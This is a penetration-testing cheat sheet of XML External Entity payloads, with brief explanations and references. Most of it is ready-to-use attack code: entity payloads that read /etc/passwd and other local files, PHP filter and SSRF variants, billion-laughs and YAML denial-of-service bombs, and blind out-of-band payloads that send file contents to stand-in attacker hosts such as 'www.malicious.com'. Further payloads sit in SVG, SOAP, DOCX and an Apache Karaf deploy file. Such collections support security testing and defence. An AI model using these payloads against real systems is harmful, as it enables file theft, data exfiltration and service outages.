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XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
Internal Entity: If an entity is declared within a DTD it is called as internal entity.
Syntax: <!ENTITY entity_name "entity_value">
External Entity: If an entity is declared outside a DTD it is called as external entity. Identified by SYSTEM
.
Syntax: <!ENTITY entity_name SYSTEM "entity_value">
Summary
- Tools
- Detect the vulnerability
- Read file content
- PHP Wrapper inside XXE
- XXE to SSRF
- Deny of service
- Blind XXE - Out of Band
- XXE in exotic files
Tools
- xxeftp
sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
- 230-OOB and payload generation via http://xxe.sh/
$ python3 230.py 2121
Detect the vulnerability
Basic entity test, when the XML parser parses the external entities the result should contain "John" in firstName
and "Doe" in lastName
. Entities are defined inside the DOCTYPE
element.
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
It might help to set the Content-Type: application/xml
in the request when sending XML payload to the server.
Read file content
Classic XXE, we try to display the content of the file /etc/passwd
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
⚠️ SYSTEM
and PUBLIC
are almost synonym.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
Classic XXE Base64 encoded
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
PHP Wrapper inside XXE
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<adress>42 rue du CTF</adress>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
XXE to SSRF
XXE can be combined with the SSRF vulnerability to target another service on the network.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://secret.dev.company.com/secret_pass.txt" >
]>
<foo>&xxe;</foo>
Deny of service
⚠️ : These attacks might kill the service or the server, do not use them on the production.
Billion Laugh Attack
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
Yaml attack
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
Blind XXE - Out of Band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
Blind XXE
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
<r></r>
Send the content of /etc/passwd
to "www.malicious.com", you may receive only the first line.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>
XXE OOB Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
XXE OOB with DTD and PHP filter
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
File stored on http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
XXE OOB with Apache Karaf
CVE-2018-11788 affecting versions:
- Apache Karaf <= 4.2.1
- Apache Karaf <= 4.1.6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto">
</feature>
</features>
Send the XML file to the deploy
folder.
XXE in exotic files
XXE inside SVG
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
XXE inside SOAP
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
XXE inside DOCX file
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
- /ppt/presentation.xml
- /xl/workbook.xml
Then update the file zip -u xxe.docx [Content_Types].xml
Tool : https://github.com/BuffaloWill/oxml_xxe
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
References
- XML External Entity (XXE) Processing - OWASP
- Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka
- staaldraad - XXE payloads
- mgeeky - XML attacks
- Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @will_is
- XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)
- Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal
- From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele
- How we got read access on Google’s production servers by detectify
- Blind OOB XXE At UBER 26+ Domains Hacked by Raghav Bisht
- XXE through SAML
- XXE in Uber to read local files
- XXE by SVG in community.lithium.com
- XXE inside SVG
- Pentest XXE - @phonexicum